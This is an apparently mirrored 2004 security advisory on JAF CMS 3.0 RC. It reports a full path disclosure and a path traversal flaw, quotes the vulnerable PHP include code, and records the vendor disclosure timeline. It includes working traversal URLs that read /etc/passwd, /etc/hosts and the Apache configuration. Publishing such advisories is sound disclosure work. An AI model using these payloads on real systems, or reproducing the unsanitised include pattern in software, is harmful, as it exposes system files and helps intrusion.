Echo Security Advisory 2004.8

2004-11-10T00:00:00
ID PACKETSTORM:34980
Type packetstorm
Reporter y3dips
Modified 2004-11-10T00:00:00

Description

                                        
                                            `  
  
ECHO_ADV_08$2004  
  
---------------------------------------------------------------------------  
Vulnerabilities in JAF CMS  
---------------------------------------------------------------------------  
  
Author: y3dips  
Date: November, 4th 2004  
Location: Indonesia, Jakarta  
Web: http://echo.or.id/adv/adv08-y3dips-2004.txt  
  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
JAF CMS - ...just another flat file CMS, is a Content Management System (CMS)  
consist of a powerful set of PHP scripts that allow you to maintain personal  
home page. There is no need for a database. The pages stored in a simple flat  
file. I've coded this script because I realize that its hard to found server  
(especially free space) offering PHP with database support already.  
  
Created by Salim "ph03y3nk"  
Version affected : 3.0 Release Candidate , Not tested on 0ther Version  
Mail Contact : ph03y3nk@users.sourceforge.net  
URL: http://jaf-cms.sourceforge.net/  
  
---------------------------------------------------------------------------  
  
Vulnerabilities:  
~~~~~~~~~~~~~~~~  
  
A. Full path disclosure:  
  
A remote user can access the file to cause the system to display an error  
message that indicates the installation path. The resulting error message  
will disclose potentially sensitive installation path information to the   
remote attacker.  
  
  
See the script in config.php  
  
---snip---  
  
function displaycontent() {  
global $jaf;  
if(file_exists("data/".$jaf['show'])) {  
require_once ("data/".$jaf['show']);  
$filemod = filemtime("data/".$jaf['show']);  
$filemodtime = date("F j, Y", $filemod);  
echo "This page last updated on : <strong>$filemodtime</strong>";  
}  
else {  
if(file_exists("news/".$jaf['show'])) {  
require_once ("news/".$jaf['show']);  
}  
else {  
echo "<p align='center'><img src='images/403-error.gif'><br /><big>  
<strong>Can't find the requested page, Sorry!!</strong></big></p>";  
}  
}  
}  
  
---snip---  
  
in that files we can see that if we supply another name of page (which is not   
in "data/" directory) , what we get is error message that define in the script  
" Can't find the requested page, Sorry!! "  
  
but what if we dont supply anything ? ,bummm ... weve got an error message that   
display installation path.  
  
POC :  
  
http://localhost/jaf/index.php?show=  
  
then we got an error  
  
Warning: displaycontent(data/): failed to open stream: Success in  
/var/www/html/jaf/config.php on line 129  
  
Fatal error: displaycontent(): Failed opening required 'data/'  
(include_path='.:/usr/share/pear') in /var/www/html/jaf/config.php on line 129  
  
  
  
B. Path Traversal  
  
Config.php files also vulnerable against basic path traversal attack which is  
use "../" special character sequence to alter the resource location requested   
in the URL. Consequently, the results can reveal source code because the file   
is interpreted as text.  
  
Exploit Code :  
  
http://localhost/jaf/index.php?show=../../../../../../../etc/passwd  
http://localhost/jaf/index.php?show=../../../../../../../etc/hosts  
http://localhost/jaf/index.php?show=../../../../../../../etc/httpd/conf/httpd.conf  
  
  
--------------------------------------------------------------------------  
  
The fix:  
~~~~~~~~  
  
Vendor allready contacted and allready fix it, maybe the vendor will released   
a new version .  
  
------------------------- - -- --- -- - -  
report to vendor 4-11-2004  
vendor allready fix the bug 6-11-2004  
advisories released to securityfocus.com 9-11-2004  
  
---------------------------------------------------------------------------  
  
Disclamier:  
~~~~~~~~~~~  
  
Advice, directions, instructions and script on security vulnerabilities  
in this advisory for educational purpose, y3dips nor echo.or.id does not  
accept responsibility for any damage or injury caused as a result of its use  
  
---------------------------------------------------------------------------  
  
Shoutz:  
~~~~~~~  
  
~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to @T echo/staff  
~ yudhax, biatch-x, lieur-euy  
~ newbie_hacker@yahoogroups.com ,  
~ #e-c-h-o & #aikmel @DALNET  
  
Greetz:  
~~~~~~~  
  
~ pho3y3nk , thx for "friendly" response. HOPE it would be a great CMS  
  
---------------------------------------------------------------------------  
Contact:  
~~~~~~~~  
  
y3dips || echo|staff || y3dips(at)echo(dot)or(dot)id  
Homepage: http://y3dips.echo.or.id/  
  
-------------------------------- [ EOF ] ----------------------------------  
`